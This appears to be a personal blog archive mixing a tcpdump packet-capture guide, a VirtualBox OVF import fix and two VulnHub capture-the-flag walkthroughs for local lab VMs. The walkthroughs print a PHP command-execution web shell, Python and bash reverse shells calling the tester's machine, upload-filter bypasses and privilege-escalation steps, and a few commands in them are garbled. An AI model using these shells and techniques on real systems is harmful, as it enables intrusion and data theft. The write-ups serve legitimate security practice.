8/04/2016

PCAP or it didn't happen

"PCAP or it didn't happen" is a good network security philosophy. The idea is simple: capture the network traffic so that it is available for analysis after the fact. In a non-corporate environment where a CentOS-based Linux host is used as a dual-homed firewall (refer to the lame ASCII art network diagram below), tcpdump was used for continuous traffic capture.
    _                                       _
  _( )______     ________     +-----+     _( )__
 ( Internet )---/ Router \----| F/W |----( DMZ  )
(____________)  \________/    +-----+   (________)


Firstly, we create a location to save the pcap files. Next, since contemporary versions of tcpdump are built with the -Z switch enabled by default, which makes tcpdump drop root and run as a less-privileged account (the tcpdump user on this version of CentOS) before it opens the first savefile, we change the ownership of that location to the tcpdump user and group and give them full read and write permission. Without this, tcpdump cannot create the capture files or rotate to the next one.

We then execute the tcpdump command to dump traffic on the interface connected to the router (-i eth1) without resolving names (-n), with slightly verbose output, which when writing to a file also makes tcpdump periodically report the number of packets captured (-v), capturing the full frame, i.e. a snap length of 0 meaning the maximum (-s 0), with a maximum file size of 512 million bytes, roughly 512MB (-C 512), rotating through at most 10 files, named capture.pcap0 to capture.pcap9 and overwritten from the beginning once the ring is full (-W 10), and writing to /var/log/traffic/capture.pcap (-w /var/log/traffic/capture.pcap).

Since the login is an interactive one, we use the nohup command so that the capture ignores the hangup signal when the session ends (nohup also sends the command's stdout and stderr to nohup.out when they are a terminal), and the & operator to run it in the background, detached from the current terminal.
  1. mkdir -p /var/log/traffic
  2. chown -R tcpdump:tcpdump /var/log/traffic
  3. chmod -R 775 /var/log/traffic
  4. nohup /usr/sbin/tcpdump -i eth1 -n -v -s 0 -C 512 -W 10 -w /var/log/traffic/capture.pcap &
Finally, to ensure the capture starts again if the server is rebooted after any hardware maintenance, copy the command in step 4 above into /etc/rc.d/rc.local without the preceding nohup (on CentOS 7 that file must also be marked executable, chmod +x /etc/rc.d/rc.local, or it will not run at boot). We should now have a rotating series of pcap files totalling roughly 5GB of network traffic; depending on requirements and available disk space, the -C and -W parameters can be tweaked to suit the number and size of files required.
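Once the ring buffer is running, the files need reading. As an added example (not part of the original post), the following Python script parses the libpcap file format that tcpdump writes, walks a directory of capture.pcap0 ... capture.pcapN files in modification-time order (once the ring wraps, suffix order no longer matches time order) and stops cleanly at a partially written trailing record, which is what the file tcpdump is currently writing looks like. The two-file ring it reads is constructed inline so that it runs offline; the file naming assumes tcpdump's -C/-W suffix convention.

```python
import glob
import os
import struct
import tempfile

PCAP_MAGIC_USEC = 0xa1b2c3d4   # classic libpcap, microsecond timestamps
PCAP_MAGIC_NSEC = 0xa1b23c4d   # nanosecond-timestamp variant
GLOBAL_HDR = 24                # magic, major, minor, thiszone, sigfigs, snaplen, linktype
RECORD_HDR = 16                # ts_sec, ts_frac, incl_len, orig_len


def read_pcap(path):
    """Yield (timestamp, captured_bytes, original_length) for each record.

    Byte order is inferred from the magic number. A partial trailing record
    (tcpdump killed mid-write, or the file currently being written in the
    ring) ends iteration quietly instead of raising.
    """
    with open(path, 'rb') as fh:
        hdr = fh.read(GLOBAL_HDR)
        if len(hdr) < GLOBAL_HDR:
            raise ValueError('%s: truncated global header' % path)
        for endian in ('<', '>'):
            magic = struct.unpack(endian + 'I', hdr[:4])[0]
            if magic in (PCAP_MAGIC_USEC, PCAP_MAGIC_NSEC):
                break
        else:
            raise ValueError('%s: not a pcap file' % path)
        divisor = 1e9 if magic == PCAP_MAGIC_NSEC else 1e6
        while True:
            rec = fh.read(RECORD_HDR)
            if len(rec) < RECORD_HDR:
                return
            ts_sec, ts_frac, incl_len, orig_len = struct.unpack(endian + 'IIII', rec)
            data = fh.read(incl_len)
            if len(data) < incl_len:
                return                      # partial record: stop here
            yield ts_sec + ts_frac / divisor, data, orig_len


def pcap_snaplen(path):
    """Snaplen stored in the global header: -s 0 is recorded as the maximum
    (65535 or 262144 depending on the tcpdump version), never as 0."""
    with open(path, 'rb') as fh:
        hdr = fh.read(GLOBAL_HDR)
    little = struct.unpack('<I', hdr[:4])[0] in (PCAP_MAGIC_USEC, PCAP_MAGIC_NSEC)
    return struct.unpack(('<' if little else '>') + 'I', hdr[16:20])[0]


def summarise_ring(directory, basename='capture.pcap'):
    """Per-file packet counts and time span for basename0, basename1, ...
    ordered by mtime, since after wrap-around capture.pcap0 is not the oldest."""
    paths = sorted(glob.glob(os.path.join(directory, basename + '*')),
                   key=os.path.getmtime)
    summary = []
    for p in paths:
        count, total, first, last = 0, 0, None, None
        for ts, data, _ in read_pcap(p):
            count += 1
            total += len(data)
            first = ts if first is None else first
            last = ts
        summary.append({'file': os.path.basename(p), 'packets': count,
                        'bytes': total, 'first': first, 'last': last})
    return summary


def write_sample(path, frames, truncate_last=False):
    """Write a constructed little-endian pcap (linktype 1 = Ethernet, snaplen
    262144). With truncate_last the final record header promises more bytes
    than follow, mimicking a file tcpdump is still writing."""
    with open(path, 'wb') as fh:
        fh.write(struct.pack('<IHHiIII', PCAP_MAGIC_USEC, 2, 4, 0, 0, 262144, 1))
        for i, frame in enumerate(frames):
            fh.write(struct.pack('<IIII', 1460000000 + i, 0, len(frame), len(frame)))
            fh.write(frame[:len(frame) // 2] if truncate_last and i == len(frames) - 1 else frame)


def demo():
    """Build a two-file ring of made-up frames in a temp dir and summarise it."""
    d = tempfile.mkdtemp()
    frame = b'\xff' * 6 + b'\x00\x11\x22\x33\x44\x55' + b'\x08\x00' + b'A' * 50  # 64 bytes
    p0, p1 = os.path.join(d, 'capture.pcap0'), os.path.join(d, 'capture.pcap1')
    write_sample(p0, [frame, frame, frame])
    write_sample(p1, [frame, frame], truncate_last=True)   # still being written
    os.utime(p0, (1460000000, 1460000000))
    os.utime(p1, (1460000100, 1460000100))
    return {'summary': summarise_ring(d), 'snaplen': pcap_snaplen(p0)}


if __name__ == '__main__':
    for entry in demo()['summary']:
        print(entry)
```

Point it at /var/log/traffic with summarise_ring('/var/log/traffic') to see how many packets and how much time each of the ten files actually holds before deciding whether -C 512 -W 10 is enough retention for the link.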

1/19/2016

vulnhub.com sickos1.1

host: 192.168.56.1
dhcp-server: 192.168.56.100
kali: 192.168.56.101

* log
  # 2015/12/26 19:00 -> 19:40 (40min)
  # 2015/12/26 22:10 -> 23:50 (1hr 40min)
  # 2015/12/27 18:20 -> 18:40 (20min)
  # total time = 2hr 40min

* discovery - target
  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24
  * found: 192.168.56.102

* discovery - services
  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102
  * found: port 22/tcp ssh, 3128/tcp squid, 8080/tcp ??
  * !!exploit-db did not reveal much
  * tried: nc -n -v 192.168.56.102 3128
  * with GET /
    * found: invalid URL error
  * with GET http://127.0.0.1/
    * found: landing page with BLEHHH!!! and PHP/5.3.10-1ubuntu3.21
  * using proxy: export http_proxy="http://192.168.56.102:3128"
  * wget http://192.168.56.102/robots.txt
  * found http://192.168.56.102/wolfcms
  * !!decided to use iceweasel with proxy instead of command line
    * did not find generator metatag
    * downloaded wolfcms
      * found: README.md, requested http://192.168.56.102/wolfcms/README.md
      * found: version = 0.8.2
      * found: , requested http://192.168.56.102/wolfcms/wolf/plugins/file_manager/file_manager.css
      * found: http://192.168.56.102/wolfcms/wolf/plugins/ is also browseable
      * found: that file_manager plugin is installed
    * read 
      - https://www.wolfcms.org/download/security-patches.html
      - http://www.securityfocus.com/archive/1/521797
      - https://www.exploit-db.com/exploits/36818/
      - https://packetstormsecurity.com/files/133011/Wolf-CMS-0.8.2-Open-Redirect.html 
      - https://github.com/wolfcms/wolfcms/issues/619
    * vulnerabilities
      * file upload
      * open redirect
    * stupidly tried admin/admin
    * uploaded shell.php using file uploaded
    * http://192.168.56.102/wolfcms/public/shell.php?cmd=id
    * used shell.php 
      * found: config.php using curl http://192.168.56.ll.php -d cmd="cat ../config.php"
      * found: mysql db=wolf, username=root, password=john@123
    * used curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=mysqldump -u root -pjohn@123 mysql"
      * found:
    * used shell.php to list directories
      * found: /var/www/connect.py
    * attempted python reverse shell
      * kali - nc -vvv -l -p 1234
      * sickos - curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.56.101\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'"
    * attempted to get tty, inside reverse shell
      * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
    * tried to use su - sickos, using the mysql password john@123, worked!!
    * sudo bash
    * ls -l /root
    * cat a0216ea4d51874464078c618298b1367.txt
    


* appendix

// shell.php
-- start of shell.php --
<?php
if(isset($_REQUEST['cmd']))
{
  $cmd = $_REQUEST['cmd'];
  system($cmd);
  echo "<pre>$cmd</pre>";
}
else
{
  echo "<pre>usage: ?cmd=</pre>";
}
?>
-- end of shell.php --

Error importing into Virtualbox

Open Virtualization Format (OVF) is an open standard for packaging and distributing virtual appliances. Essentially it is meant to make software and virtual machines portable across different hypervisors, such as VMware, VirtualBox, etc. However, I got an error when importing an OVF file into VirtualBox version 5.0.12 r104815:

  Error reading "XXXXXX.ovf": Host resource of type "Other Storage Device (20)" is supported with SATA AHCI controllers only, line 47.

  Result Code: VBOX_E_FILE_ERROR (0x80BB0004)
  Component: ApplianceWrap
  Interface: IAppliance {XXXXXX}

Fixed it by following the instructions on the VirtualBox forum [1]:
  1. Edited the .ovf file in vim.
    • :%s/ElementName/Caption/g
    • :%s/vmware.sata.ahci/AHCI/
  2. Deleted the .mf file; it holds digests of the original .ovf, so after editing, the import fails with an error about being unable to verify the manifest.

Attempted re-import of the appliance into VirtualBox 5. The only noticeable issue was that the name defaulted to "vm", which was easily resolved by double clicking the name and entering the correct name for the virtual machine.
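The same two edits in script form, with the manifest regenerated rather than deleted so that VirtualBox can still verify it. This is an added example, not from the post or the forum thread: the OVF text is a constructed, trimmed snippet showing only the offending elements, the disk image is a dummy file, and the manifest line format SHA1(name)= digest is assumed to be what VirtualBox and VMware emit.

```python
import hashlib
import os
import re
import tempfile

# Constructed, trimmed OVF (not the real appliance) containing the two things
# VirtualBox 5.0 choked on: rasd:ElementName and the vmware.sata.ahci subtype.
SAMPLE_OVF = '''<?xml version="1.0" encoding="UTF-8"?>
<Envelope xmlns="http://schemas.dmtf.org/ovf/envelope/1"
 xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1"
 xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData">
  <References>
    <File ovf:href="vm-disk1.vmdk" ovf:id="file1"/>
  </References>
  <VirtualSystem ovf:id="vm">
    <VirtualHardwareSection>
      <Item>
        <rasd:ElementName>SATA Controller</rasd:ElementName>
        <rasd:ResourceSubType>vmware.sata.ahci</rasd:ResourceSubType>
        <rasd:ResourceType>20</rasd:ResourceType>
      </Item>
    </VirtualHardwareSection>
  </VirtualSystem>
</Envelope>
'''


def patch_ovf_text(text):
    """Same edits as the vim commands: every ElementName -> Caption, and the
    first vmware.sata.ahci on each line -> AHCI."""
    text = text.replace('ElementName', 'Caption')
    return '\n'.join(line.replace('vmware.sata.ahci', 'AHCI', 1)
                     for line in text.split('\n'))


def referenced_files(ovf_text):
    """File names listed under <References>; the manifest covers these too."""
    return re.findall(r'ovf:href="([^"]+)"', ovf_text)


def write_manifest(ovf_path, algorithm='sha1'):
    """Regenerate <name>.mf from the files as they now are on disk.

    Assumed line format (what VirtualBox and VMware write):
        SHA1(vm.ovf)= <hexdigest>
    """
    base = os.path.dirname(ovf_path)
    names = [os.path.basename(ovf_path)]
    with open(ovf_path, 'rb') as fh:
        names += referenced_files(fh.read().decode('utf-8'))
    lines = []
    for name in names:
        h = hashlib.new(algorithm)
        with open(os.path.join(base, name), 'rb') as fh:
            h.update(fh.read())
        lines.append('%s(%s)= %s' % (algorithm.upper(), name, h.hexdigest()))
    with open(os.path.splitext(ovf_path)[0] + '.mf', 'w') as fh:
        fh.write('\n'.join(lines) + '\n')
    return lines


def fix_appliance(ovf_path):
    """Patch the .ovf in place, then refresh its manifest; return both."""
    with open(ovf_path, 'rb') as fh:
        patched = patch_ovf_text(fh.read().decode('utf-8'))
    with open(ovf_path, 'wb') as fh:
        fh.write(patched.encode('utf-8'))
    return patched, write_manifest(ovf_path)


def demo():
    """Lay out the constructed appliance in a temp dir and fix it."""
    d = tempfile.mkdtemp()
    ovf = os.path.join(d, 'vm.ovf')
    with open(ovf, 'wb') as fh:
        fh.write(SAMPLE_OVF.encode('utf-8'))
    with open(os.path.join(d, 'vm-disk1.vmdk'), 'wb') as fh:
        fh.write(b'KDMV' + b'\x00' * 28)   # dummy disk; only its digest matters
    return fix_appliance(ovf)


if __name__ == '__main__':
    patched, manifest = demo()
    print(patched)
    print('\n'.join(manifest))
```

Run fix_appliance('/path/to/XXXXXX.ovf') on a real export; if the original manifest used SHA256 lines, pass algorithm='sha256' to write_manifest to match.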

References:

  1. https://forums.virtualbox.org/viewtopic.php?f=8&t=61624

vulnhub.com fristileaks1.3

host: 192.168.56.1
dhcp-server: 192.168.56.100
kali: 192.168.56.101

* log
  # 2015/12/24 14:45 -> 16:30 (1hr 45min)
  # 2015/12/25 15:00 -> 17:45 (2hr 45min)
  # total time = 4hrs 30min

* discovery - target
  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24
  * found target: 192.168.56.102
  
* discovery - services
  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102
  * found ports: 80

* enumerate port 80
  * wget http://192.168.56.102
  * cat index.html
  * wget http://192.168.56.102/images/keep-calm.png
  * wget http://192.168.56.102/robots.txt
    * robots.txt: disallow /cola /sisi /beer
  * wget http://192.168.56.102/cola/
    * since it's not the URL, and we should drink fristi
  * wget http://192.168.56.102/fristi/
    * cat index.html
      * read the description meta tag regarding the comment about base64
      * noticed second commented out base64
      * suspect username: eezeepz
    * extracted commented out line using vi
      * deleted other lines
      * joined all lines (:%j)
      * removed spaces (:%s/\ //g)
      * saved into fristi_img2.txt
  * base64 -d fristi_img2.txt > img2
  * file img2
  * mv img2 img2.png
  * suspect password: keKkeKKeKKeKkEkkEk
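The vi steps above (join lines, strip spaces, base64 -d, file) can be scripted. As an added example, not part of the original write-up, this Python script pulls every HTML comment out of a page, tries to base64-decode it, and identifies the result from its leading bytes the way file(1) would. The HTML it reads is constructed inline (a PNG signature followed by dummy bytes, not the real fristi image) so that it runs offline.

```python
import base64
import re

# Constructed stand-in for the fristi index.html: a PNG signature plus dummy
# bytes, base64-encoded and wrapped across indented lines inside an HTML
# comment, the way the page hid its second image.
_FAKE_PNG = b'\x89PNG\r\n\x1a\n' + b'\x00' * 24
_B64 = base64.b64encode(_FAKE_PNG).decode('ascii')
_WRAPPED = '\n'.join('    ' + _B64[i:i + 16] for i in range(0, len(_B64), 16))
SAMPLE_HTML = '''<html><head>
<meta name="description" content="constructed sample page">
</head><body>
<!-- TODO: remove this comment before go-live -->
<!--
%s
-->
</body></html>''' % _WRAPPED

# A few signatures, enough to tell images from archives and binaries.
MAGIC = [
    (b'\x89PNG\r\n\x1a\n', 'png'),
    (b'\xff\xd8\xff', 'jpeg'),
    (b'GIF87a', 'gif'),
    (b'GIF89a', 'gif'),
    (b'%PDF-', 'pdf'),
    (b'PK\x03\x04', 'zip'),
    (b'\x7fELF', 'elf'),
    (b'\x1f\x8b', 'gzip'),
]


def html_comments(html):
    """Body of every <!-- ... --> comment, multi-line ones included."""
    return re.findall(r'<!--(.*?)-->', html, re.DOTALL)


def decode_base64_blob(text):
    """Strip whitespace (the :%j and :%s/\ //g steps), check the alphabet,
    repair missing padding and decode; None if this is not base64."""
    compact = re.sub(r'\s+', '', text)
    if not compact or not re.match(r'^[A-Za-z0-9+/]+={0,2}$', compact):
        return None
    compact += '=' * (-len(compact) % 4)
    try:
        return base64.b64decode(compact)
    except (TypeError, ValueError):   # py2 raises TypeError, py3 binascii.Error
        return None


def sniff(data):
    """Poor man's file(1): match the leading bytes against MAGIC."""
    for sig, label in MAGIC:
        if data.startswith(sig):
            return label
    return 'unknown'


def extract_hidden_blobs(html):
    """Comments that decode as base64, with what they appear to contain."""
    found = []
    for idx, body in enumerate(html_comments(html)):
        data = decode_base64_blob(body)
        if data is None:
            continue
        found.append({'comment': idx, 'type': sniff(data),
                      'size': len(data), 'data': data})
    return found


if __name__ == '__main__':
    for blob in extract_hidden_blobs(SAMPLE_HTML):
        name = 'img%d.%s' % (blob['comment'], blob['type'])
        with open(name, 'wb') as fh:
            fh.write(blob['data'])
        print('comment %d -> %s (%d bytes)' % (blob['comment'], name, blob['size']))
```

Feed it the saved index.html instead of SAMPLE_HTML and it writes one file per decodable comment, already named by type, so the base64 -d / file / mv dance is one step.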

* access
  * http://192.168.56.102/fristi/
  * myusername: eezeepz, mypassword: keKkeKKeKKeKkEkkEk
  * logged into http://192.168.56.102/fristi/login_success.php
  * clicked upload file link to http://192.168.56.102/fristi/upload.php
  * uploaded img2.png and got message regarding /uploads
  * verified upload location http://192.168.56.102/fristi/uploads/img2.png

* attempted shell access using weevely (failed)
  * generated weevely shell: weevely generate password shell.php
  * cp /usr/share/weevely/shell.php .
  * attempted upload: only allowed png,jpg,gif
  * mv shell.php shell.gif
  * uploaded and connected
  * weevely http://192.168.56.102/fristi/uploads/shell.gif password
  * fixed python issues
    * tar zxvf PySocks-1.5.6.tar.gz
    * cd PySocks-1.5.6/
    * ./setup.py build
    * ./setup.py install
  * weevely http://192.168.56.102/fristi/uploads/shell.gif password
  * unable to connect

* used old script to execute commands
  * renamed to shell.php.jpg
  * uploaded file
  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg?cmd=id
  * uid=48(apache) gid=48(apache) groups=48(apache)
  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg -d cmd="cat /etc/passwd"
  * found: eezeepz, admin, fristigod, fristi
  * ls -l /home/
  * found: drwx---r-x. on eezeepz
  * ls -l /home/eezeepz
  * found: 
    * notes.txt
    * commands (various)
  * cat /home/eezeepz/notes.txt
  * found: 
    * cron runs /tmp/runthis with admin privileges every minute
    * commands chmod, df, cat, echo, ps, grep, egrep in /home/admin
    * access to /usr/bin/*
  * changed access to /home/admin
    * curl http://192s/shell.php.jpg -d cmd="echo '/home/admin/chmod 755 /home/admin/' > /tmp/runthis"
  * ls -las /home/admin/
  * found: cryptedpass.txt, cryptpass.py, and whoisyourgodnow.txt (owner by fristigod)
  * cat /home/admin/whoisyourgodnow.txt
  * found: =RFn0AKnlMHMPIzpyuTI0ITG
  * cat /home/admin/cryptedpass.txt
  * found: mVGZ3O3omkJLmy2pcuTq
  * cat /home/admin/cryptpass.py
  * found:
    * function does base64 then rot13
  * created own script to decrypt password
  * python ./decryptpass.py mVGZ3O3omkJLmy2pcuTq
  * found: thisisalsopw123
  * python ./decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
  * found: LetThereBeFristi!
 
* interactive shell
  * got tired of using the php script and decided to get interactive shell
  * on kali: nc -n -vvv -l -p 80
  * ran via php: /bin/bash -i > /dev/tcp/192.168.56.101/80 0<&1 2>&1, but encoded for url as %2Fbin%2Fbash%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.56.101%2F80%200%3C%261%202%3E%261
  * now have shell (without TTY, so cannot use su yet)
  * find files owned by users
    * find / -user eezeepz 2>&1 | grep -v "Permission denied"
    * find / -user admin 2>&1 | grep -v "Permission denied"
    * find / -user fristi 2>&1 | grep -v "Permission denied"
    * find / -user fristigod 2>&1 | grep -v "Permission denied"
      * found: /var/fristigod
    * found: empty mailboxes
    * found: /var/www/notes.txt 
      * not very useful since we already figured this out
  * tried to get tty shell 
    // https://pen-testing.sans.org/blog/2014/07/08/sneaky-stealthy-su-in-web-shells
    // http://netsec.ws/?p=337
  * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
  * used: su fristigod and password: LetThereBeFristi!
  * cd /var/fristigod
  * ls -las 
  * found: .bash_history and .secret_admin_stuff
  * cat .bash_history
  * found: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
  * ls -las /var/fristigod/.secret_admin_stuff/
  * found: setuid/setgid bits set on doCom, owned by root:root
  * file /var/fristigod/.secret_admin_stuff/doCom
  * strings /var/fristigod/.secret_admin_stuff/doCom
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
  * found: Usage: ./program_name terminal_command ...
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
  * found: uid=0(root) gid=100(users) groups=100(users),502(fristigod)
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash
  !! got root !!
  * found: cat /root/fristileaks_secrets.txt
  * cat /root/fristileaks_secrets.txt
  * found: Flag: Y0u_kn0w_y0u_l0ve_fr1st1

# Other
* /root/.c has source for doCom
* cat /root/.mysql_history
  

* appendix
// http://snipplr.com/view/72936/simple-php-backdoor-shell/
-- start of old script -- 
<?php
if(isset($_REQUEST['cmd']))
{
  $cmd = $_REQUEST['cmd'];
  system($cmd);
  echo "<pre>$cmd</pre>";
}
else
{
  echo "<pre>usage: ?cmd=</pre>";
}
?>
-- end of old script


// modified cryptpass.py script
-- start of decryptpass.py script --
# Inverse of the cryptpass.py found in /home/admin. That script encodes as
# base64 -> reverse -> rot13, so we undo it as rot13 -> reverse -> base64
# decode (rot13 is a per-character map, so it commutes with the reverse).
# Works under Python 2 and 3: python ./decryptpass.py mVGZ3O3omkJLmy2pcuTq
import base64
import codecs
import sys


def encodeString(s):
    # same transform as cryptpass.py on the target, kept for reference
    base64string = base64.b64encode(s.encode('ascii')).decode('ascii')
    return codecs.encode(base64string[::-1], 'rot13')


def decodeString(s):
    rottedString = codecs.encode(s[::-1], 'rot13')
    return base64.b64decode(rottedString).decode('ascii')


if __name__ == '__main__':
    if len(sys.argv) != 2:
        sys.exit('usage: %s <encoded string>' % sys.argv[0])
    print(decodeString(sys.argv[1]))
-- end of decryptpass.py script --